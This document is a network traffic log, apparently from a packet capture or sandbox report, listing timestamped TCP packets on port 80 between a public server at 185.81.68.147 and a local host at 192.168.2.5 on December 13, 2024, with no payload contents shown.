Dec 13, 2024 01:37:35.929534912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929596901 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929606915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929641008 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929651976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929660082 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929671049 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929805994 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929815054 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929847002 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929855108 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929869890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929909945 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.929919004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.930073977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.930083990 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.930095911 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.930113077 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.930120945 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.932188034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932228088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932244062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932272911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932290077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932312965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932400942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932400942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932400942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932400942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932420969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932446003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932466030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932486057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932508945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932543993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932559013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932578087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932595015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932636023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932650089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932677984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932693005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932718992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932734013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932759047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932774067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.932801008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.936862946 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.936913967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.936925888 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.936933041 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.936953068 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937108040 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937155008 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937164068 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937196970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937205076 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937280893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937505960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937521935 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937546015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937555075 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937561989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937576056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937596083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937603951 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937612057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937779903 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937788010 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937797070 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937817097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937902927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.937923908 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938179016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938199043 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938215971 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938338995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938401937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938410044 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938422918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938438892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938496113 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938535929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938649893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938673973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938692093 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938705921 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938714027 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938745975 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938858986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938905954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938919067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938927889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.938993931 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939109087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939146996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939215899 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939227104 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939234972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939459085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939469099 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939505100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939512968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939578056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939703941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939786911 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939930916 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939939976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939946890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.939954996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940057039 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940069914 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940078020 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940100908 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940109015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940136909 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940148115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940165043 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940323114 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940337896 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940346003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940475941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940509081 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940515995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940522909 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940555096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940646887 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940685987 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940696955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940825939 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940829039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.940835953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940849066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940856934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.940911055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.940928936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.940948009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.940974951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.940995932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941013098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941021919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941021919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941051006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941060066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941082001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941085100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941096067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941138983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941154003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941176891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941190958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941216946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941239119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941247940 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941257000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.941257000 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941292048 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941299915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941307068 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941328049 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941447973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941467047 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941495895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941504955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941586971 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941608906 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941626072 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941783905 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941792965 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941819906 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.941828012 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942054033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942065001 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942094088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942231894 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942312002 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942323923 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942338943 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942347050 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942354918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942372084 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942379951 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942558050 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942580938 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942616940 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942651987 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942667007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942675114 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942780972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942790985 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942796946 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942805052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942811966 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942820072 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942822933 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.942842960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946841955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946851015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946877956 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946887016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946893930 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946921110 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946932077 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946973085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946980953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.946994066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947021961 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947032928 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947045088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947063923 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947072983 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947086096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.947145939 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.950511932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.950546026 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952358961 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952367067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952373981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952382088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952445030 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952452898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952465057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952472925 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952483892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952495098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952532053 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952538967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952548981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952557087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952662945 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952671051 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952677011 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952685118 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952688932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952696085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952703953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952713966 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952724934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952732086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952739954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952747107 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952759981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952770948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952778101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952789068 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952800035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952806950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952810049 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952812910 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952821016 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952828884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952836037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952843904 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952851057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.952857971 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:35.960621119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960675955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960676908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960676908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960760117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960760117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960760117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960783005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960792065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960815907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960830927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960853100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960871935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960891008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960908890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960927963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960949898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960964918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.960988045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961010933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961034060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961081028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961091042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961117029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961131096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961153984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961169004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961194038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961209059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961230993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961245060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.961260080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963397980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963416100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963439941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963464975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963478088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963500977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963511944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963534117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.963551044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968255997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968271971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968297005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968311071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968362093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968362093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968390942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968415022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968436956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968460083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968477964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968498945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968514919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968539953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968616009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968616009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968616009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968632936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968652010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968664885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968688965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968713999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968735933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968760014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968776941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968800068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968813896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968839884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968869925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968894958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968918085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968933105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968949080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968964100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.968986988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.969002008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.969029903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.969053030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973069906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973087072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973110914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973124027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973149061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.973159075 CET	49775	80	192.168.2.5	185.81.68.147
